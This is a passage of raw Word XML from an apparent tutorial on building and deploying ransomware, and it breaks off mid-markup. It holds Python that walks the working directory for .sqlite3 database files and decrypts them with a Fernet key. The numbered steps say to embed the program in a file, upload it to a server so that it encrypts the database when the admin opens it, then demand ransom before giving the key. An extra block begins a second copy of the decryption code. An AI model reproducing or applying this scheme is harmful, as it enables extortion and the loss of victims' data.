                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EF34181" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">from glob import glob </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1524BB72" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D37C620" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:right="5079"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>all_files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> = [] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>start_dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>os.getcwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">() pattern   = "*.sqlite3" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB89EEE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="237" w:lineRule="auto"/>
              <w:ind w:right="1581"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,_</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">,_ in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>os.walk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>start_dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">):     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>all_files.extend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(glob(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>os.path.join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>dir,pattern</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">))) import sys </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B5DA1F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="237" w:lineRule="auto"/>
              <w:ind w:right="2908"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>cryptography.fernet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> import Fernet with open("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>key.key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>rb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">") as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>thekey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">:     code = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>thekey.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">() for file in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>all_files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>:     try:         with open(file, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>rb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">") as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>enc_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="437D7994" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">            contents = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>enc_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>file.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FAE03F3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="1580"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>raw_contents</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> = Fernet(code</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>).decrypt</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(contents)         with open(file, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>wb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">") as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>enc_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">:             </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>enc_file.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>raw_contents</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">)     except:         print("{} not </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>decrypted".format</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">(file))         pass </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E87DADB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE3F680" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="355" w:right="98" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Embed the application in a file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074588E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="355" w:right="98" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Try uploading the file to the server. The server(admin) when opens the file, the application will automatically encrypt all the data in the database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A760112" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="355" w:right="98" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Then ask for the ransom, give the decryption key once the ransom is paid </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14064C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27428DFE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(Extra): Code for decryption </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8128" w:type="dxa"/>
        <w:tblInd w:w="1152" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="38" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F97B52" w14:paraId="364B633C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="4378"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3F4E10D5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E880C4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">from glob import glob </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A09A52" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="464D21B1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2" w:line="237" w:lineRule="auto"/>
              <w:ind w:right="5079"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>all_files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> = [] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>start_dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>os.getcwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">() pattern   = "*.sqlite3" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18125E57" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="236" w:lineRule="auto"/>
              <w:ind w:right="3876"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,_</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">,_ in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>os.walk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>start_dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B9FDAF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>all_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>files.extend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(glob(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
